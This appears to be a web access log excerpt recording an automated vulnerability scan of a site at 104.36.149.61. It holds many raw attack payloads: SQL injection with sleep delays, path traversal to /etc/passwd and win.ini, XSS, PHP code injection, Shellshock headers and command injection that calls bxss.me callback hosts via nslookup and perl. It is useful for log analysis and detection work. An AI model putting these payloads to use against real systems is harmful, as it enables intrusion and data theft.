/cgi-bin/logs 1 -
/acc/skin/install/default/default/..%2fcss/clears.css 1 https://104.36.149.61/
/cgi-sys/addalink.cgi 1 ()%20{%20Referer
/%3b(nslookup%20hithavehacfvtaf7d1.bxss.me||perl%20-e%20\"gethostbyname('hithavehacfvtaf7d1.bxss.me')\")|(nslookup%20hithavehacfvtaf7d1.bxss.me||perl%20-e%20\"gethostbyname('hithavehacfvtaf7d1.bxss.me')\")&(nslookup%20hithavehacfvtaf7d1.bxss.me||perl%20-e% 1 -
/piwik/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 -
/acc/js/prototype/validation.js/950915%40 1 https://104.36.149.61/
/091uzmwf')%20OR%20553=(SELECT%20553%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd 1 -
/$(nslookup%20hitoiyekdzviraf482.bxss.me||perl%20-e%20\"gethostbyname('hitoiyekdzviraf482.bxss.me')\")/js/mage/adminhtml/product/ 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/wizard/config/ 1 https://104.36.149.61/
/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/etc/passwd 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/adminer-4.2.5-en.php 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/&(nslookup%20hitrlypzcxcji52d97.bxss.me||perl%20-e%20\"gethostbyname('hitrlypzcxcji52d97.bxss.me')\")&'\\\"`0&(nslookup%20hitrlypzcxcji52d97.bxss.me||perl%20-e%20\"gethostbyname('hitrlypzcxcji52d97.bxss.me')\")&`'/js/mage/adminhtml/uploader/ 1 -
/acc/index.php/install/wizard/beginPost/../../../../../package-lock.json 1 -
/backup-104.sql.gz 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'BsDZ'!='BsDZ%25/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/plugins/editors/fckeditor 2 -
/${@print(md5(31337))}/js/mage/adminhtml/flexuploader.js 1 -
/acc/index.php/..%2fpackage.json 1 -
/_fragment 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(109).concat(89).concat(112).concat(90)+(require'socket'%0aSocket.gethostbyname('hitpi'+'grjcvzvn38f9c.bxss.me.')[3].to_s)+'/js/mage/ 1 -
/min/index.php 1 -
/cgi-bin/gulpfile.js 1 -
/oiKLGWWa'%20OR%20554=(SELECT%20554%20FROM%20PG_SLEEP(15))--/js/varien/js.js 1 https://104.36.149.61/
/acc'||'/js/prototype/extended_debug.js 1 https://104.36.149.61/
/cgi-sys/FormMail-clone.cgi 1 ()%20{%20Referer
/\"%3bprint(md5(31337))%3b$a=\"/skin/frontend/ 1 -
/acc/index.php/install/wizard/locale//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/index.php/install//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
//js/varien/form.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/prototype.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/phpMyAdmin/ 1 -
/acc/skin/install/%2fxfs.bxss.me/default/css/iestyles.css 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/varien/form.js 1 -
/.htaccess.old 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/events.js 1 https://104.36.149.61/
/acc9846102/skin/frontend/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/prototype.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitfeaqqyvlqb8cd4c.bxss.me||perl%20-e%20\"gethostbyname('hitfeaqqyvlqb8cd4c.bxss.me')\")|(nslookup%20hitfeaqqyvlqb8cd4c.bxss.me||perl%20-e%20\"gethostbyname('hitfeaqqyvlqb8cd4c.bxss.me')\")&(nslookup%20hitfeaqqyvlqb8cd4c.bxss.me||perl%2 1 -
/acc/.%2fskin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/JaehRUXi/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/..%2f..%2f..%2fpackage-lock.json 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/default/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/'\"()&%25<acx><ScRiPt%20>QlCt(9720)<%2fScRiPt>.js 1 https://104.36.149.61/
/admin.cgi 1 ()%20{%20Referer
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/104_backup.tgz 1 -
/.bash_profile 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/windows/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
//../../WEB-INF/web.xml%00.jsp 1 -
/${@print(md5(31337))}/js/mage/adminhtml/wysiwyg/ 1 -
/acc/index.php/install//../WEB-INF/web.xml%00.jsp 1 -
/%3b(nslookup%20hitkamapyjjiq742af.bxss.me||perl%20-e%20\"gethostbyname('hitkamapyjjiq742af.bxss.me')\")|(nslookup%20hitkamapyjjiq742af.bxss.me||perl%20-e%20\"gethostbyname('hitkamapyjjiq742af.bxss.me')\")&(nslookup%20hitkamapyjjiq742af.bxss.me||perl%20-e% 1 -
/acc'\"()&%25<acx><ScRiPt%20>eCQQ(9962)<%2fScRiPt>/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/prototype/windows/themes/ 1 -
//........................................................................../../../../../../../../etc/passwd 1 -
/css/../../../../../../../../../../../../../etc/shells 1 -
/7LeGEKpD/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/uploader/ 1 -
/%3b(nslookup%20hitazecfnssxla9029.bxss.me||perl%20-e%20\"gethostbyname('hitazecfnssxla9029.bxss.me')\")|(nslookup%20hitazecfnssxla9029.bxss.me||perl%20-e%20\"gethostbyname('hitazecfnssxla9029.bxss.me')\")&(nslookup%20hitazecfnssxla9029.bxss.me||perl%20-e% 1 -
/BRRlRNKJ'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/prototype.js 1 https://104.36.149.61/
/authenticationendpoint/pwned.jsp 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/varien/js.js 1 https://104.36.149.61/
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/)/js/prototype/windows/ 1 https://104.36.149.61/
/'+response.write(9612660*9888266)+'/skin/frontend/ 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/accordion.js 1 -
/\".gethostbyname(lc(\"hitep\".\"ungowwdv28e01.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(119).chr(81).chr(104).chr(82).\"/js/prototype/windows/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/varien/js.js 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>ZcmW(9662)<%2fScRiPt>/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/css/clears.css 1 https://104.36.149.61/
//..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini 1 -
/'\"()&%25<acx><ScRiPt%20>fIWy(9263)<%2fScRiPt>/js/prototype/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2flocale/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/css/iestyles.css 1 https://104.36.149.61/
//js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/(nslookup%20hitfccnioozbcf1ff0.bxss.me||perl%20-e%20\"gethostbyname('hitfccnioozbcf1ff0.bxss.me')\")/skin/adminhtml/default/ 1 -
/acc/%3b(nslookup%20hitpchcfalnxd2452c.bxss.me||perl%20-e%20\"gethostbyname('hitpchcfalnxd2452c.bxss.me')\")|(nslookup%20hitpchcfalnxd2452c.bxss.me||perl%20-e%20\"gethostbyname('hitpchcfalnxd2452c.bxss.me')\")&(nslookup%20hitpchcfalnxd2452c.bxss.me||perl%2 1 -
/%3b(nslookup%20hitqyumzsscwr592df.bxss.me||perl%20-e%20\"gethostbyname('hitqyumzsscwr592df.bxss.me')\")|(nslookup%20hitqyumzsscwr592df.bxss.me||perl%20-e%20\"gethostbyname('hitqyumzsscwr592df.bxss.me')\")&(nslookup%20hitqyumzsscwr592df.bxss.me||perl%20-e% 1 -
/backup.7z 1 -
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/default/css/clears.css 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hithm\".\"lvhurzje2bd52.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(112).chr(65).chr(105).chr(70).\"/js/varien/js.js 1 -
/acc/%2fxfs.bxss.me/install/ 1 -
/cgi-bin/.irb_history 1 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2fpackage.json 1 -
/acc/%3b(nslookup%20hitwpwepolzprf8928.bxss.me||perl%20-e%20\"gethostbyname('hitwpwepolzprf8928.bxss.me')\")|(nslookup%20hitwpwepolzprf8928.bxss.me||perl%20-e%20\"gethostbyname('hitwpwepolzprf8928.bxss.me')\")&(nslookup%20hitwpwepolzprf8928.bxss.me||perl%2 1 -
/kbsxrdXw 1 -
/@@8BNR5/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css/'\"()&%25<acx><ScRiPt%20>Ijhk(9612)<%2fScRiPt>.css 1 https://104.36.149.61/
/acc/..%2fjs/prototype/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/hash.js 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/browser.js 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/adminhtml/backup.js 1 -
/otrs/ 1 -
/acc/index.php/install/..%2fweb.config 1 -
/Http://bxss.me/t/fit.txt/js/prototype/windows/ 1 https://104.36.149.61/
/acc/index.php/install/1%00%c0%a7%c0%a2%252527%252522/locale/ 1 https://104.36.149.61/
/.well-known/security.txt 8 -
/..%2facc/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/giftoptions/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/giftmessage.js 1 -
/admin/LiveLogSettingsServlet 1 -
/acc/js/prototype/windows/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/cgi-bin/.irbrc 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/\"+response.write(9975357*9127767)+\"/skin/adminhtml/default/ 1 -
/icons/sphere1.png 2 -
/.%2facc/index.php/install/wizard/config/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(109).concat(87).concat(105).concat(65)+(require\"socket\"%0aSocket.gethostbyname(\"hitov\"+\"jahhbeeb0a6ee.bxss.me.\")[3].to_s)+\"/skin/install/default/default/css/reset.css 1 -
/'\"()&%25<acx><ScRiPt%20>JVyg(9255)<%2fScRiPt>/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//........................................................................../../../../../../../../windows/win.ini 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/ 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/giftmessage.js 1 https://104.36.149.61/
/config/initializers/secret_token.rb 1 -
/acc/js/varien<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js.js 1 -
/$(nslookup%20hitgbwqphfogh6a215.bxss.me||perl%20-e%20\"gethostbyname('hitgbwqphfogh6a215.bxss.me')\")/js/mage/adminhtml/uploader/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(98).concat(66).concat(110).concat(77)+(require'socket'%0aSocket.gethostbyname('hitkd'+'ioaidieaf47b7.bxss.me.')[3].to_s)+'/js/mage/adminhtml/grid.js 1 -
/acc/../../../../../../../../z/../../../../../../../../../etc/shells 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/../../../../../package.json 1 -
/epa/scripts/win/nsepa_setup.exe 2 -
/acc/skin/install/default/default/%2fxfs.bxss.me/iestyles.css 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/image.js 1 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype.js 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/(nslookup%20hitqjgdtdnpiw95afd.bxss.me||perl%20-e%20\"gethostbyname('hitqjgdtdnpiw95afd.bxss.me')\")/js/mage/adminhtml/browser.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>mxOU(9984)<%2fScRiPt>/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/themes/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/scrollbar.js/985838%40 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/product/ 1 -
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/css/clears.css 1 https://104.36.149.61/
/acc9391977/js/prototype/windows/ 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>IUUR(9632)<%2fScRiPt>/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/sales/ 1 https://104.36.149.61/
/104.36.149.61-dump.sql 1 -
/'%3bprint(md5(31337))%3b$a='/js/prototype/tooltip_manager.js 1 -
/CVS/Root 1 -
/<!--/js/mage/adminhtml/giftmessage.js 1 -
/acc/index.php//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/Gruntfile.js 1 -
/<!--/js/mage/adminhtml/sales/ 1 -
/adminer-4.3.0.php 1 https://104.36.149.61/
/-1%20OR%202+405-405-1=0+0+0+1/js/mage/translate.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/varien/form.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/form.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc//mage/adminhtml/events.js 1 https://104.36.149.61/
/${@print(md5(31337))}/js/prototype/tooltip.js 1 -
/|(nslookup%20hitpifvuvyconfe3fa.bxss.me||perl%20-e%20\"gethostbyname('hitpifvuvyconfe3fa.bxss.me')\")/js/prototype/tooltip.js 1 -
/dra.php 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/debug.js 1 -
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/prototype/windows/themes/ 1 https://104.36.149.61/
/'+response.write(9923192*9052317)+'/js/mage/adminhtml/giftmessage.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/ 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/install/default/default/css/boxes.css 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/css/boxes.css 1 -
/acc/js/.%2fmage/adminhtml/browser.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/index.php/install/wizard/config/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>gumy(9745)<%2fScRiPt>/adminhtml/default/ 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/ 1 -
/\"+response.write(9293666*9931356)+\"/js/prototype/windows/themes/ 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/backup.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/database.yml 1 -
/cgi-bin/./WEB-INF/web.xml 2 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/translate.js 1 -
/acc/skin/install/default/default/.%2fcss/boxes.css 1 https://104.36.149.61/
//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 3 -
/'%3bprint(md5(31337))%3b$a='/index.php/install/wizard/locale/ 1 -
/cgi-bin/bower.json 1 -
/jvyr0ehozmbg.jsp 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/hash.js 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/ 1 https://104.36.149.61/
/)/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/backup.js 1 -
/acc/index.php/install/../../../web.config 1 -
/acc/index.php/install/wizard/beginPost//./WEB-INF/web.xml%00.jsp 1 -
/response.write(9207482*9743140)/js/mage/adminhtml/accordion.js 1 -
/!(()&&!|*|*|/js/prototype/tooltip.js 1 https://104.36.149.61/
/js/tinymce 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/adminhtml/default/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/cgi-bin/.htaccess~ 1 -
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/ 1 -
/)/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/wizard/locale/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/index.php/install/ 1 -
/'\"()&%25<acx><ScRiPt%20>ja2b(9489)<%2fScRiPt>/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>QlCt(9014)<%2fScRiPt>/accordion.js 1 https://104.36.149.61/
/'+response.write(9579160*9940985)+'/skin/install/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/debug.js 1 https://104.36.149.61/
/acc/skin/..%2finstall/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//........................................................................../../../../../../../../windows/win.ini 1 -
/'%3bprint(md5(31337))%3b$a='/js/prototype/extended_debug.js 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(113).concat(82).concat(108).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitef\"+\"fxzrurlkd9ce4.bxss.me.\")[3].to_s)+\"/js/prototype/debug.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>2DaK(9474)<%2fScRiPt>/mage/ 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/extended_debug.js 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/plugin/index.html 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/varien/form.js 1 -
/ifrk2FZU/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/css/ie7minus.css 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/flexuploader.js 1 -
/1'\"/index.php/install/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/translate.js 1 https://104.36.149.61/
/${10000431+9999574}/js/prototype/tooltip_manager.js 1 -
/acc/js/.%2fmage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'tdWf'='tdWf/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>KYzi(9904)<%2fScRiPt>/image.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/lib/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/js/..%2fmage/adminhtml/uploader/ 1 https://104.36.149.61/
/'+response.write(9504856*9376755)+'/js/mage/adminhtml/backup.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/browser.js 1 https://104.36.149.61/
/cgi-mod/index.cgi 1 ()%20{%20Referer
/acc/js/mage/adminhtml/giftmessage.js/995987%40 1 https://104.36.149.61/
/@@cc4vR/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc//mage/adminhtml/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/install/default/default/css/ie7minus.css 1 -
/6BUubGjR')%20OR%20764=(SELECT%20764%20FROM%20PG_SLEEP(15))--/skin/install/default/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/<!--/skin/install/default/ 1 -
/acc/js/scriptaculous/./WEB-INF/web.xml%00.jsp 2 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/flexuploader.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>6DR8(9758)<%2fScRiPt>/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/pVLLDQPc'))%20OR%2062=(SELECT%2062%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/locale/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(115).concat(81).concat(115).concat(66)+(require'socket'%0aSocket.gethostbyname('hitac'+'eseylztfe3991.bxss.me.')[3].to_s)+'/js/mage/adminhtml/sales/ 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../windows/win.ini 2 -
/y8AMa2e3')%20OR%20232=(SELECT%20232%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/grid.js 1 -
/acc/skin/install/default/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/iestyles.css 1 https://104.36.149.61/
/axis2/services/listServices 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/hash.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/varien/js.js 1 https://104.36.149.61/
/db.sql.gz 1 -
/-1%20OR%202+885-885-1=0+0+0+1/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitivkstoiiole1838.bxss.me||perl%20-e%20\"gethostbyname('hitivkstoiiole1838.bxss.me')\")|(nslookup%20hitivkstoiiole1838.bxss.me||perl%20-e%20\"gethostbyname('hitivkstoiiole1838.bxss.me')\")&(nslookup%20hitivkstoiiole1838.bxss.me||perl%2 1 -
/acc/index.php/install/wizard//../../../../../../../../etc/passwd%00.jpg 1 -
/acc/skin/install/default/default/%3b(nslookup%20hithsrpwhartpd4686.bxss.me||perl%20-e%20\"gethostbyname('hithsrpwhartpd4686.bxss.me')\")|(nslookup%20hithsrpwhartpd4686.bxss.me||perl%20-e%20\"gethostbyname('hithsrpwhartpd4686.bxss.me')\")&(nslookup%20hiths 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/prototype.js 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/streaming/clients_live.php 4 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/scriptaculous/effects.js 1 -
/n2gXyBZS/js/prototype/validation.js 1 https://104.36.149.61/
/tYSyYyI8'%20OR%2091=(SELECT%2091%20FROM%20PG_SLEEP(15))--/js/mage/translate.js 1 https://104.36.149.61/
/acc//mage/adminhtml/browser.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/extended_debug.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/tooltip_manager.js 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/hash.js 1 -
/acc9082951/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"oTM3\"=\"oTM3/js/prototype/tooltip.js 1 https://104.36.149.61/
